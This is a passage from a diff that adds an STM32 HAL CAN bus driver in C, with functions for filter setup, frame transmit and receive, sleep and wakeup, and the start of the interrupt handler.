sFilterConfig) +{ + uint32_t filternbrbitpos = 0U; + CAN_TypeDef *can_ip; + + /* Prevent unused argument(s) compilation warning */ + UNUSED(hcan); + + /* Check the parameters */ + assert_param(IS_CAN_FILTER_NUMBER(sFilterConfig->FilterNumber)); + assert_param(IS_CAN_FILTER_MODE(sFilterConfig->FilterMode)); + assert_param(IS_CAN_FILTER_SCALE(sFilterConfig->FilterScale)); + assert_param(IS_CAN_FILTER_FIFO(sFilterConfig->FilterFIFOAssignment)); + assert_param(IS_FUNCTIONAL_STATE(sFilterConfig->FilterActivation)); + assert_param(IS_CAN_BANKNUMBER(sFilterConfig->BankNumber)); + + filternbrbitpos = 1U << sFilterConfig->FilterNumber; +#if defined (CAN3) + /* Check the CAN instance */ + if(hcan->Instance == CAN3) + { + can_ip = CAN3; + } + else + { + can_ip = CAN1; + } +#else + can_ip = CAN1; +#endif + + /* Initialisation mode for the filter */ + can_ip->FMR |= (uint32_t)CAN_FMR_FINIT; + +#if defined (CAN2) + /* Select the start slave bank */ + can_ip->FMR &= ~((uint32_t)CAN_FMR_CAN2SB); + can_ip->FMR |= (uint32_t)(sFilterConfig->BankNumber << 8U); +#endif + + /* Filter Deactivation */ + can_ip->FA1R &= ~(uint32_t)filternbrbitpos; + + /* Filter Scale */ + if (sFilterConfig->FilterScale == CAN_FILTERSCALE_16BIT) + { + /* 16-bit scale for the filter */ + can_ip->FS1R &= ~(uint32_t)filternbrbitpos; + + /* First 16-bit identifier and First 16-bit mask */ + /* Or First 16-bit identifier and Second 16-bit identifier */ + can_ip->sFilterRegister[sFilterConfig->FilterNumber].FR1 = + ((0x0000FFFFU & (uint32_t)sFilterConfig->FilterMaskIdLow) << 16U) | + (0x0000FFFFU & (uint32_t)sFilterConfig->FilterIdLow); + + /* Second 16-bit identifier and Second 16-bit mask */ + /* Or Third 16-bit identifier and Fourth 16-bit identifier */ + can_ip->sFilterRegister[sFilterConfig->FilterNumber].FR2 = + ((0x0000FFFFU & (uint32_t)sFilterConfig->FilterMaskIdHigh) << 16U) | + (0x0000FFFFU & (uint32_t)sFilterConfig->FilterIdHigh); + } + + if (sFilterConfig->FilterScale == CAN_FILTERSCALE_32BIT) + { + /* 32-bit scale for the filter */ + can_ip->FS1R |= filternbrbitpos; + + /* 32-bit identifier or First 32-bit identifier */ + can_ip->sFilterRegister[sFilterConfig->FilterNumber].FR1 = + ((0x0000FFFFU & (uint32_t)sFilterConfig->FilterIdHigh) << 16U) | + (0x0000FFFFU & (uint32_t)sFilterConfig->FilterIdLow); + /* 32-bit mask or Second 32-bit identifier */ + can_ip->sFilterRegister[sFilterConfig->FilterNumber].FR2 = + ((0x0000FFFFU & (uint32_t)sFilterConfig->FilterMaskIdHigh) << 16U) | + (0x0000FFFFU & (uint32_t)sFilterConfig->FilterMaskIdLow); + } + + /* Filter Mode */ + if (sFilterConfig->FilterMode == CAN_FILTERMODE_IDMASK) + { + /*Id/Mask mode for the filter*/ + can_ip->FM1R &= ~(uint32_t)filternbrbitpos; + } + else /* CAN_FilterInitStruct->CAN_FilterMode == CAN_FilterMode_IdList */ + { + /*Identifier list mode for the filter*/ + can_ip->FM1R |= (uint32_t)filternbrbitpos; + } + + /* Filter FIFO assignment */ + if (sFilterConfig->FilterFIFOAssignment == CAN_FILTER_FIFO0) + { + /* FIFO 0 assignation for the filter */ + can_ip->FFA1R &= ~(uint32_t)filternbrbitpos; + } + + if (sFilterConfig->FilterFIFOAssignment == CAN_FILTER_FIFO1) + { + /* FIFO 1 assignation for the filter */ + can_ip->FFA1R |= (uint32_t)filternbrbitpos; + } + + /* Filter activation */ + if (sFilterConfig->FilterActivation == ENABLE) + { + can_ip->FA1R |= filternbrbitpos; + } + + /* Leave the initialisation mode for the filter */ + can_ip->FMR &= ~((uint32_t)CAN_FMR_FINIT); + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Deinitializes the CANx peripheral registers to their default reset values. + * @param hcan pointer to a CAN_HandleTypeDef structure that contains + * the configuration information for the specified CAN. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_CAN_DeInit(CAN_HandleTypeDef* hcan) +{ + /* Check CAN handle */ + if(hcan == NULL) + { + return HAL_ERROR; + } + + /* Check the parameters */ + assert_param(IS_CAN_ALL_INSTANCE(hcan->Instance)); + + /* Change CAN state */ + hcan->State = HAL_CAN_STATE_BUSY; + + /* DeInit the low level hardware */ + HAL_CAN_MspDeInit(hcan); + + /* Change CAN state */ + hcan->State = HAL_CAN_STATE_RESET; + + /* Release Lock */ + __HAL_UNLOCK(hcan); + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Initializes the CAN MSP. + * @param hcan pointer to a CAN_HandleTypeDef structure that contains + * the configuration information for the specified CAN. + * @retval None + */ +__weak void HAL_CAN_MspInit(CAN_HandleTypeDef* hcan) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hcan); + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_CAN_MspInit could be implemented in the user file + */ +} + +/** + * @brief DeInitializes the CAN MSP. + * @param hcan pointer to a CAN_HandleTypeDef structure that contains + * the configuration information for the specified CAN. + * @retval None + */ +__weak void HAL_CAN_MspDeInit(CAN_HandleTypeDef* hcan) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hcan); + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_CAN_MspDeInit could be implemented in the user file + */ +} + +/** + * @} + */ + +/** @defgroup CAN_Exported_Functions_Group2 IO operation functions + * @brief IO operation functions + * +@verbatim + ============================================================================== + ##### IO operation functions ##### + ============================================================================== + [..] This section provides functions allowing to: + (+) Transmit a CAN frame message. + (+) Receive a CAN frame message. + (+) Enter CAN peripheral in sleep mode. + (+) Wake up the CAN peripheral from sleep mode. + +@endverbatim + * @{ + */ + +/** + * @brief Initiates and transmits a CAN frame message. + * @param hcan pointer to a CAN_HandleTypeDef structure that contains + * the configuration information for the specified CAN. + * @param Timeout Specify Timeout value + * @retval HAL status + */ +HAL_StatusTypeDef HAL_CAN_Transmit(CAN_HandleTypeDef* hcan, uint32_t Timeout) +{ + uint32_t transmitmailbox = CAN_TXSTATUS_NOMAILBOX; + uint32_t tickstart = 0U; + + /* Check the parameters */ + assert_param(IS_CAN_IDTYPE(hcan->pTxMsg->IDE)); + assert_param(IS_CAN_RTR(hcan->pTxMsg->RTR)); + assert_param(IS_CAN_DLC(hcan->pTxMsg->DLC)); + + if(((hcan->Instance->TSR&CAN_TSR_TME0) == CAN_TSR_TME0) || \ + ((hcan->Instance->TSR&CAN_TSR_TME1) == CAN_TSR_TME1) || \ + ((hcan->Instance->TSR&CAN_TSR_TME2) == CAN_TSR_TME2)) + { + /* Process locked */ + __HAL_LOCK(hcan); + + /* Change CAN state */ + switch(hcan->State) + { + case(HAL_CAN_STATE_BUSY_RX0): + hcan->State = HAL_CAN_STATE_BUSY_TX_RX0; + break; + case(HAL_CAN_STATE_BUSY_RX1): + hcan->State = HAL_CAN_STATE_BUSY_TX_RX1; + break; + case(HAL_CAN_STATE_BUSY_RX0_RX1): + hcan->State = HAL_CAN_STATE_BUSY_TX_RX0_RX1; + break; + default: /* HAL_CAN_STATE_READY */ + hcan->State = HAL_CAN_STATE_BUSY_TX; + break; + } + + /* Select one empty transmit mailbox */ + if ((hcan->Instance->TSR&CAN_TSR_TME0) == CAN_TSR_TME0) + { + transmitmailbox = CAN_TXMAILBOX_0; + } + else if ((hcan->Instance->TSR&CAN_TSR_TME1) == CAN_TSR_TME1) + { + transmitmailbox = CAN_TXMAILBOX_1; + } + else + { + transmitmailbox = CAN_TXMAILBOX_2; + } + + /* Set up the Id */ + hcan->Instance->sTxMailBox[transmitmailbox].TIR &= CAN_TI0R_TXRQ; + if (hcan->pTxMsg->IDE == CAN_ID_STD) + { + assert_param(IS_CAN_STDID(hcan->pTxMsg->StdId)); + hcan->Instance->sTxMailBox[transmitmailbox].TIR |= ((hcan->pTxMsg->StdId << 21U) | \ + hcan->pTxMsg->RTR); + } + else + { + assert_param(IS_CAN_EXTID(hcan->pTxMsg->ExtId)); + hcan->Instance->sTxMailBox[transmitmailbox].TIR |= ((hcan->pTxMsg->ExtId << 3U) | \ + hcan->pTxMsg->IDE | \ + hcan->pTxMsg->RTR); + } + + /* Set up the DLC */ + hcan->pTxMsg->DLC &= (uint8_t)0x0000000F; + hcan->Instance->sTxMailBox[transmitmailbox].TDTR &= (uint32_t)0xFFFFFFF0U; + hcan->Instance->sTxMailBox[transmitmailbox].TDTR |= hcan->pTxMsg->DLC; + + /* Set up the data field */ + hcan->Instance->sTxMailBox[transmitmailbox].TDLR = (((uint32_t)hcan->pTxMsg->Data[3U] << 24U) | + ((uint32_t)hcan->pTxMsg->Data[2U] << 16U) | + ((uint32_t)hcan->pTxMsg->Data[1U] << 8U) | + ((uint32_t)hcan->pTxMsg->Data[0U])); + hcan->Instance->sTxMailBox[transmitmailbox].TDHR = (((uint32_t)hcan->pTxMsg->Data[7U] << 24U) | + ((uint32_t)hcan->pTxMsg->Data[6U] << 16U) | + ((uint32_t)hcan->pTxMsg->Data[5U] << 8U) | + ((uint32_t)hcan->pTxMsg->Data[4U])); + /* Request transmission */ + hcan->Instance->sTxMailBox[transmitmailbox].TIR |= CAN_TI0R_TXRQ; + + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Check End of transmission flag */ + while(!(__HAL_CAN_TRANSMIT_STATUS(hcan, transmitmailbox))) + { + /* Check for the Timeout */ + if(Timeout != HAL_MAX_DELAY) + { + if((Timeout == 0U)||((HAL_GetTick() - tickstart ) > Timeout)) + { + hcan->State = HAL_CAN_STATE_TIMEOUT; + + __HAL_CAN_CANCEL_TRANSMIT(hcan, transmitmailbox); + + /* Process unlocked */ + __HAL_UNLOCK(hcan); + return HAL_TIMEOUT; + } + } + } + + /* Change CAN state */ + switch(hcan->State) + { + case(HAL_CAN_STATE_BUSY_TX_RX0): + hcan->State = HAL_CAN_STATE_BUSY_RX0; + break; + case(HAL_CAN_STATE_BUSY_TX_RX1): + hcan->State = HAL_CAN_STATE_BUSY_RX1; + break; + case(HAL_CAN_STATE_BUSY_TX_RX0_RX1): + hcan->State = HAL_CAN_STATE_BUSY_RX0_RX1; + break; + default: /* HAL_CAN_STATE_BUSY_TX */ + hcan->State = HAL_CAN_STATE_READY; + break; + } + + /* Process unlocked */ + __HAL_UNLOCK(hcan); + + /* Return function status */ + return HAL_OK; + } + else + { + /* Change CAN state */ + hcan->State = HAL_CAN_STATE_ERROR; + + /* Return function status */ + return HAL_ERROR; + } +} + +/** + * @brief Initiates and transmits a CAN frame message. + * @param hcan pointer to a CAN_HandleTypeDef structure that contains + * the configuration information for the specified CAN. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_CAN_Transmit_IT(CAN_HandleTypeDef* hcan) +{ + uint32_t transmitmailbox = CAN_TXSTATUS_NOMAILBOX; + + /* Check the parameters */ + assert_param(IS_CAN_IDTYPE(hcan->pTxMsg->IDE)); + assert_param(IS_CAN_RTR(hcan->pTxMsg->RTR)); + assert_param(IS_CAN_DLC(hcan->pTxMsg->DLC)); + + if(((hcan->Instance->TSR&CAN_TSR_TME0) == CAN_TSR_TME0) || \ + ((hcan->Instance->TSR&CAN_TSR_TME1) == CAN_TSR_TME1) || \ + ((hcan->Instance->TSR&CAN_TSR_TME2) == CAN_TSR_TME2)) + { + /* Process Locked */ + __HAL_LOCK(hcan); + + /* Select one empty transmit mailbox */ + if((hcan->Instance->TSR&CAN_TSR_TME0) == CAN_TSR_TME0) + { + transmitmailbox = CAN_TXMAILBOX_0; + } + else if((hcan->Instance->TSR&CAN_TSR_TME1) == CAN_TSR_TME1) + { + transmitmailbox = CAN_TXMAILBOX_1; + } + else + { + transmitmailbox = CAN_TXMAILBOX_2; + } + + /* Set up the Id */ + hcan->Instance->sTxMailBox[transmitmailbox].TIR &= CAN_TI0R_TXRQ; + if(hcan->pTxMsg->IDE == CAN_ID_STD) + { + assert_param(IS_CAN_STDID(hcan->pTxMsg->StdId)); + hcan->Instance->sTxMailBox[transmitmailbox].TIR |= ((hcan->pTxMsg->StdId << 21U) | \ + hcan->pTxMsg->RTR); + } + else + { + assert_param(IS_CAN_EXTID(hcan->pTxMsg->ExtId)); + hcan->Instance->sTxMailBox[transmitmailbox].TIR |= ((hcan->pTxMsg->ExtId << 3U) | \ + hcan->pTxMsg->IDE | \ + hcan->pTxMsg->RTR); + } + + /* Set up the DLC */ + hcan->pTxMsg->DLC &= (uint8_t)0x0000000F; + hcan->Instance->sTxMailBox[transmitmailbox].TDTR &= (uint32_t)0xFFFFFFF0U; + hcan->Instance->sTxMailBox[transmitmailbox].TDTR |= hcan->pTxMsg->DLC; + + /* Set up the data field */ + hcan->Instance->sTxMailBox[transmitmailbox].TDLR = (((uint32_t)hcan->pTxMsg->Data[3U] << 24U) | + ((uint32_t)hcan->pTxMsg->Data[2U] << 16U) | + ((uint32_t)hcan->pTxMsg->Data[1U] << 8U) | + ((uint32_t)hcan->pTxMsg->Data[0U])); + hcan->Instance->sTxMailBox[transmitmailbox].TDHR = (((uint32_t)hcan->pTxMsg->Data[7U] << 24U) | + ((uint32_t)hcan->pTxMsg->Data[6U] << 16U) | + ((uint32_t)hcan->pTxMsg->Data[5U] << 8U) | + ((uint32_t)hcan->pTxMsg->Data[4U])); + + /* Change CAN state */ + switch(hcan->State) + { + case(HAL_CAN_STATE_BUSY_RX0): + hcan->State = HAL_CAN_STATE_BUSY_TX_RX0; + break; + case(HAL_CAN_STATE_BUSY_RX1): + hcan->State = HAL_CAN_STATE_BUSY_TX_RX1; + break; + case(HAL_CAN_STATE_BUSY_RX0_RX1): + hcan->State = HAL_CAN_STATE_BUSY_TX_RX0_RX1; + break; + default: /* HAL_CAN_STATE_READY */ + hcan->State = HAL_CAN_STATE_BUSY_TX; + break; + } + + /* Set CAN error code to none */ + hcan->ErrorCode = HAL_CAN_ERROR_NONE; + + /* Process Unlocked */ + __HAL_UNLOCK(hcan); + + /* Request transmission */ + hcan->Instance->sTxMailBox[transmitmailbox].TIR |= CAN_TI0R_TXRQ; + + /* Enable Error warning, Error passive, Bus-off, + Last error and Error Interrupts */ + __HAL_CAN_ENABLE_IT(hcan, CAN_IT_EWG | + CAN_IT_EPV | + CAN_IT_BOF | + CAN_IT_LEC | + CAN_IT_ERR | + CAN_IT_TME); + } + else + { + /* Change CAN state */ + hcan->State = HAL_CAN_STATE_ERROR; + + /* Return function status */ + return HAL_ERROR; + } + + return HAL_OK; +} + +/** + * @brief Receives a correct CAN frame. + * @param hcan pointer to a CAN_HandleTypeDef structure that contains + * the configuration information for the specified CAN. + * @param FIFONumber FIFO Number value + * @param Timeout Specify Timeout value + * @retval HAL status + */ +HAL_StatusTypeDef HAL_CAN_Receive(CAN_HandleTypeDef* hcan, uint8_t FIFONumber, uint32_t Timeout) +{ + uint32_t tickstart = 0U; + CanRxMsgTypeDef* pRxMsg = NULL; + + /* Check the parameters */ + assert_param(IS_CAN_FIFO(FIFONumber)); + + /* Check if CAN state is not busy for RX FIFO0 */ + if ((FIFONumber == CAN_FIFO0) && ((hcan->State == HAL_CAN_STATE_BUSY_RX0) || \ + (hcan->State == HAL_CAN_STATE_BUSY_TX_RX0) || \ + (hcan->State == HAL_CAN_STATE_BUSY_RX0_RX1) || \ + (hcan->State == HAL_CAN_STATE_BUSY_TX_RX0_RX1))) + { + return HAL_BUSY; + } + + /* Check if CAN state is not busy for RX FIFO1 */ + if ((FIFONumber == CAN_FIFO1) && ((hcan->State == HAL_CAN_STATE_BUSY_RX1) || \ + (hcan->State == HAL_CAN_STATE_BUSY_TX_RX1) || \ + (hcan->State == HAL_CAN_STATE_BUSY_RX0_RX1) || \ + (hcan->State == HAL_CAN_STATE_BUSY_TX_RX0_RX1))) + { + return HAL_BUSY; + } + + /* Process locked */ + __HAL_LOCK(hcan); + + /* Change CAN state */ + if (FIFONumber == CAN_FIFO0) + { + switch(hcan->State) + { + case(HAL_CAN_STATE_BUSY_TX): + hcan->State = HAL_CAN_STATE_BUSY_TX_RX0; + break; + case(HAL_CAN_STATE_BUSY_RX1): + hcan->State = HAL_CAN_STATE_BUSY_RX0_RX1; + break; + case(HAL_CAN_STATE_BUSY_TX_RX1): + hcan->State = HAL_CAN_STATE_BUSY_TX_RX0_RX1; + break; + default: /* HAL_CAN_STATE_READY */ + hcan->State = HAL_CAN_STATE_BUSY_RX0; + break; + } + } + else /* FIFONumber == CAN_FIFO1 */ + { + switch(hcan->State) + { + case(HAL_CAN_STATE_BUSY_TX): + hcan->State = HAL_CAN_STATE_BUSY_TX_RX1; + break; + case(HAL_CAN_STATE_BUSY_RX0): + hcan->State = HAL_CAN_STATE_BUSY_RX0_RX1; + break; + case(HAL_CAN_STATE_BUSY_TX_RX0): + hcan->State = HAL_CAN_STATE_BUSY_TX_RX0_RX1; + break; + default: /* HAL_CAN_STATE_READY */ + hcan->State = HAL_CAN_STATE_BUSY_RX1; + break; + } + } + + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Check pending message */ + while(__HAL_CAN_MSG_PENDING(hcan, FIFONumber) == 0U) + { + /* Check for the Timeout */ + if(Timeout != HAL_MAX_DELAY) + { + if((Timeout == 0U)||((HAL_GetTick() - tickstart ) > Timeout)) + { + hcan->State = HAL_CAN_STATE_TIMEOUT; + /* Process unlocked */ + __HAL_UNLOCK(hcan); + return HAL_TIMEOUT; + } + } + } + + /* Set RxMsg pointer */ + if(FIFONumber == CAN_FIFO0) + { + pRxMsg = hcan->pRxMsg; + } + else /* FIFONumber == CAN_FIFO1 */ + { + pRxMsg = hcan->pRx1Msg; + } + + /* Get the Id */ + pRxMsg->IDE = (uint8_t)0x04 & hcan->Instance->sFIFOMailBox[FIFONumber].RIR; + if (pRxMsg->IDE == CAN_ID_STD) + { + pRxMsg->StdId = 0x000007FFU & (hcan->Instance->sFIFOMailBox[FIFONumber].RIR >> 21U); + } + else + { + pRxMsg->ExtId = 0x1FFFFFFFU & (hcan->Instance->sFIFOMailBox[FIFONumber].RIR >> 3U); + } + + pRxMsg->RTR = (uint8_t)0x02 & hcan->Instance->sFIFOMailBox[FIFONumber].RIR; + /* Get the DLC */ + pRxMsg->DLC = (uint8_t)0x0F & hcan->Instance->sFIFOMailBox[FIFONumber].RDTR; + /* Get the FMI */ + pRxMsg->FMI = (uint8_t)0xFF & (hcan->Instance->sFIFOMailBox[FIFONumber].RDTR >> 8U); + /* Get the FIFONumber */ + pRxMsg->FIFONumber = FIFONumber; + /* Get the data field */ + pRxMsg->Data[0] = (uint8_t)0xFF & hcan->Instance->sFIFOMailBox[FIFONumber].RDLR; + pRxMsg->Data[1] = (uint8_t)0xFF & (hcan->Instance->sFIFOMailBox[FIFONumber].RDLR >> 8U); + pRxMsg->Data[2] = (uint8_t)0xFF & (hcan->Instance->sFIFOMailBox[FIFONumber].RDLR >> 16U); + pRxMsg->Data[3] = (uint8_t)0xFF & (hcan->Instance->sFIFOMailBox[FIFONumber].RDLR >> 24U); + pRxMsg->Data[4] = (uint8_t)0xFF & hcan->Instance->sFIFOMailBox[FIFONumber].RDHR; + pRxMsg->Data[5] = (uint8_t)0xFF & (hcan->Instance->sFIFOMailBox[FIFONumber].RDHR >> 8U); + pRxMsg->Data[6] = (uint8_t)0xFF & (hcan->Instance->sFIFOMailBox[FIFONumber].RDHR >> 16U); + pRxMsg->Data[7] = (uint8_t)0xFF & (hcan->Instance->sFIFOMailBox[FIFONumber].RDHR >> 24U); + + /* Release the FIFO */ + if(FIFONumber == CAN_FIFO0) + { + /* Release FIFO0 */ + __HAL_CAN_FIFO_RELEASE(hcan, CAN_FIFO0); + } + else /* FIFONumber == CAN_FIFO1 */ + { + /* Release FIFO1 */ + __HAL_CAN_FIFO_RELEASE(hcan, CAN_FIFO1); + } + + /* Change CAN state */ + if (FIFONumber == CAN_FIFO0) + { + switch(hcan->State) + { + case(HAL_CAN_STATE_BUSY_TX_RX0): + hcan->State = HAL_CAN_STATE_BUSY_TX; + break; + case(HAL_CAN_STATE_BUSY_RX0_RX1): + hcan->State = HAL_CAN_STATE_BUSY_RX1; + break; + case(HAL_CAN_STATE_BUSY_TX_RX0_RX1): + hcan->State = HAL_CAN_STATE_BUSY_TX_RX1; + break; + default: /* HAL_CAN_STATE_BUSY_RX0 */ + hcan->State = HAL_CAN_STATE_READY; + break; + } + } + else /* FIFONumber == CAN_FIFO1 */ + { + switch(hcan->State) + { + case(HAL_CAN_STATE_BUSY_TX_RX1): + hcan->State = HAL_CAN_STATE_BUSY_TX; + break; + case(HAL_CAN_STATE_BUSY_RX0_RX1): + hcan->State = HAL_CAN_STATE_BUSY_RX0; + break; + case(HAL_CAN_STATE_BUSY_TX_RX0_RX1): + hcan->State = HAL_CAN_STATE_BUSY_TX_RX0; + break; + default: /* HAL_CAN_STATE_BUSY_RX1 */ + hcan->State = HAL_CAN_STATE_READY; + break; + } + } + + /* Process unlocked */ + __HAL_UNLOCK(hcan); + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Receives a correct CAN frame. + * @param hcan Pointer to a CAN_HandleTypeDef structure that contains + * the configuration information for the specified CAN. + * @param FIFONumber Specify the FIFO number + * @retval HAL status + */ +HAL_StatusTypeDef HAL_CAN_Receive_IT(CAN_HandleTypeDef* hcan, uint8_t FIFONumber) +{ + /* Check the parameters */ + assert_param(IS_CAN_FIFO(FIFONumber)); + + /* Check if CAN state is not busy for RX FIFO0 */ + if((FIFONumber == CAN_FIFO0) && ((hcan->State == HAL_CAN_STATE_BUSY_RX0) || \ + (hcan->State == HAL_CAN_STATE_BUSY_TX_RX0) || \ + (hcan->State == HAL_CAN_STATE_BUSY_RX0_RX1) || \ + (hcan->State == HAL_CAN_STATE_BUSY_TX_RX0_RX1))) + { + return HAL_BUSY; + } + + /* Check if CAN state is not busy for RX FIFO1 */ + if((FIFONumber == CAN_FIFO1) && ((hcan->State == HAL_CAN_STATE_BUSY_RX1) || \ + (hcan->State == HAL_CAN_STATE_BUSY_TX_RX1) || \ + (hcan->State == HAL_CAN_STATE_BUSY_RX0_RX1) || \ + (hcan->State == HAL_CAN_STATE_BUSY_TX_RX0_RX1))) + { + return HAL_BUSY; + } + + /* Process locked */ + __HAL_LOCK(hcan); + + /* Change CAN state */ + if(FIFONumber == CAN_FIFO0) + { + switch(hcan->State) + { + case(HAL_CAN_STATE_BUSY_TX): + hcan->State = HAL_CAN_STATE_BUSY_TX_RX0; + break; + case(HAL_CAN_STATE_BUSY_RX1): + hcan->State = HAL_CAN_STATE_BUSY_RX0_RX1; + break; + case(HAL_CAN_STATE_BUSY_TX_RX1): + hcan->State = HAL_CAN_STATE_BUSY_TX_RX0_RX1; + break; + default: /* HAL_CAN_STATE_READY */ + hcan->State = HAL_CAN_STATE_BUSY_RX0; + break; + } + } + else /* FIFONumber == CAN_FIFO1 */ + { + switch(hcan->State) + { + case(HAL_CAN_STATE_BUSY_TX): + hcan->State = HAL_CAN_STATE_BUSY_TX_RX1; + break; + case(HAL_CAN_STATE_BUSY_RX0): + hcan->State = HAL_CAN_STATE_BUSY_RX0_RX1; + break; + case(HAL_CAN_STATE_BUSY_TX_RX0): + hcan->State = HAL_CAN_STATE_BUSY_TX_RX0_RX1; + break; + default: /* HAL_CAN_STATE_READY */ + hcan->State = HAL_CAN_STATE_BUSY_RX1; + break; + } + } + /* Set CAN error code to none */ + hcan->ErrorCode = HAL_CAN_ERROR_NONE; + + /* Enable interrupts: */ + /* - Enable Error warning Interrupt */ + /* - Enable Error passive Interrupt */ + /* - Enable Bus-off Interrupt */ + /* - Enable Last error code Interrupt */ + /* - Enable Error Interrupt */ + /* - Enable Transmit mailbox empty Interrupt */ + __HAL_CAN_ENABLE_IT(hcan, CAN_IT_EWG | + CAN_IT_EPV | + CAN_IT_BOF | + CAN_IT_LEC | + CAN_IT_ERR | + CAN_IT_TME); + + /* Process unlocked */ + __HAL_UNLOCK(hcan); + + if(FIFONumber == CAN_FIFO0) + { + /* Enable FIFO 0 overrun and message pending Interrupt */ + __HAL_CAN_ENABLE_IT(hcan, CAN_IT_FOV0 | CAN_IT_FMP0); + } + else + { + /* Enable FIFO 1 overrun and message pending Interrupt */ + __HAL_CAN_ENABLE_IT(hcan, CAN_IT_FOV1 | CAN_IT_FMP1); + } + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Enters the Sleep (low power) mode. + * @param hcan pointer to a CAN_HandleTypeDef structure that contains + * the configuration information for the specified CAN. + * @retval HAL status. + */ +HAL_StatusTypeDef HAL_CAN_Sleep(CAN_HandleTypeDef* hcan) +{ + uint32_t tickstart = 0U; + + /* Process locked */ + __HAL_LOCK(hcan); + + /* Change CAN state */ + hcan->State = HAL_CAN_STATE_BUSY; + + /* Request Sleep mode */ + hcan->Instance->MCR = (((hcan->Instance->MCR) & (uint32_t)(~(uint32_t)CAN_MCR_INRQ)) | CAN_MCR_SLEEP); + + /* Sleep mode status */ + if ((hcan->Instance->MSR & (CAN_MSR_SLAK|CAN_MSR_INAK)) != CAN_MSR_SLAK) + { + /* Process unlocked */ + __HAL_UNLOCK(hcan); + + /* Return function status */ + return HAL_ERROR; + } + + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Wait the acknowledge */ + while((hcan->Instance->MSR & (CAN_MSR_SLAK|CAN_MSR_INAK)) != CAN_MSR_SLAK) + { + if((HAL_GetTick() - tickstart) > CAN_TIMEOUT_VALUE) + { + hcan->State = HAL_CAN_STATE_TIMEOUT; + /* Process unlocked */ + __HAL_UNLOCK(hcan); + return HAL_TIMEOUT; + } + } + + /* Change CAN state */ + hcan->State = HAL_CAN_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hcan); + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Wakes up the CAN peripheral from sleep mode, after that the CAN peripheral + * is in the normal mode. + * @param hcan pointer to a CAN_HandleTypeDef structure that contains + * the configuration information for the specified CAN. + * @retval HAL status. + */ +HAL_StatusTypeDef HAL_CAN_WakeUp(CAN_HandleTypeDef* hcan) +{ + uint32_t tickstart = 0U; + + /* Process locked */ + __HAL_LOCK(hcan); + + /* Change CAN state */ + hcan->State = HAL_CAN_STATE_BUSY; + + /* Wake up request */ + hcan->Instance->MCR &= ~(uint32_t)CAN_MCR_SLEEP; + + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Sleep mode status */ + while((hcan->Instance->MSR & CAN_MSR_SLAK) == CAN_MSR_SLAK) + { + if((HAL_GetTick() - tickstart) > CAN_TIMEOUT_VALUE) + { + hcan->State= HAL_CAN_STATE_TIMEOUT; + /* Process unlocked */ + __HAL_UNLOCK(hcan); + return HAL_TIMEOUT; + } + } + if((hcan->Instance->MSR & CAN_MSR_SLAK) == CAN_MSR_SLAK) + { + /* Process unlocked */ + __HAL_UNLOCK(hcan); + + /* Return function status */ + return HAL_ERROR; + } + + /* Change CAN state */ + hcan->State = HAL_CAN_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hcan); + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Handles CAN interrupt request + * @param hcan pointer to a CAN_HandleTypeDef structure that contains + * the configuration information for the specified CAN. + * @retval None + */ +void HAL_CAN_IRQHandler(CAN_HandleTypeDef* hcan) +{ + uint32_t tmp1 = 0U, tmp2 = 0U, tmp3 = 0U; + uint32_t errorcode = HAL_CAN_ERROR_NONE; + + /* Check Overrun flag for FIFO0 */ + tmp1 = __HAL_CAN_GET_FLAG(hcan, CAN_FLAG_FOV0); + tmp2 = __HAL_CAN_GET_IT_SOURCE(hcan, CAN_IT_FOV0); + if(tmp1 && tmp2) + { + /* Set CAN error code to FOV0 error */ + errorcode |= HAL_CAN_ERROR_FOV0; + + /* Clear FIFO0 Overrun Flag */ + __HAL_CAN_CLEAR_FLAG(hcan, CAN_FLAG_FOV0); + } + /* Check Overrun flag for FIFO1 */ + tmp1 = __HAL_CAN_GET_FLAG(hcan, CAN_FLAG_FOV1); + tmp2 = __HAL_CAN_GET_IT_SOURCE(hcan, CAN_IT_FOV1); + + if(tmp1 && tmp2) + { + /* Set CAN error code to FOV1 error */ + errorcode |= HAL_CAN_ERROR_FOV1; + + /* Clear FIFO1 Overrun Flag */ + __HAL_CAN_CLEAR_FLAG(hcan, CAN_FLAG_FOV1); + } + + /* Check End of transmission flag */ + if(__HAL_CAN_GET_IT_SOURCE(hcan, CAN_IT_TME)) + { + tmp1 = __HAL_CAN_TRANSMIT_STATUS(hcan, CAN_TXMAILBOX_0); + tmp2 = __HAL_CAN_TRANSMIT_STATUS(hcan, CAN_TXMAILBOX_1); + tmp3 = __HAL_CAN_TRANSMIT_STATUS(hcan, CAN_TXMAILBOX_2); + if(tmp1 || tmp2 || tmp3) + { + tmp1 = __HAL_CAN_GET_FLAG(hcan, CAN_FLAG_TXOK0); + tmp2 = __HAL_CAN_GET_FLAG(hcan, CAN_FLAG_TXOK1); + tmp3 = __HAL_CAN_GET_FLAG(hcan, CAN_FLAG_TXOK2); + /* Check Transmit success */ + if(tmp1 || tmp2 || tmp3) + { + /* Call transmit function */ + CAN_Transmit_IT(hcan); + } + else /* Transmit failure */ + { + /* Set CAN error code to TXFAIL error */ + errorcode |= HAL_CAN_ERROR_TXFAIL; + } + + /* Clear transmission status flags (RQCPx and TXOKx) */ + SET_BIT(hcan->Instance->TSR, CAN_TSR_RQCP0 | CAN_TSR_RQCP1 | CAN_TSR_RQCP2 | \ + CAN_FLAG_TXOK0 | CAN_FLAG_TXOK1 | CAN_FLAG_TXOK2); + } + } + + tmp1 = __HAL_CAN_MSG_PENDING(hcan, CAN_FIFO0); + tmp2 = __HAL_CAN_GET_IT_SOURCE(hcan, CAN_IT_FMP0); + /* Check End of reception flag for FIFO0 */ + if((tmp1 != 0U) && tmp2) 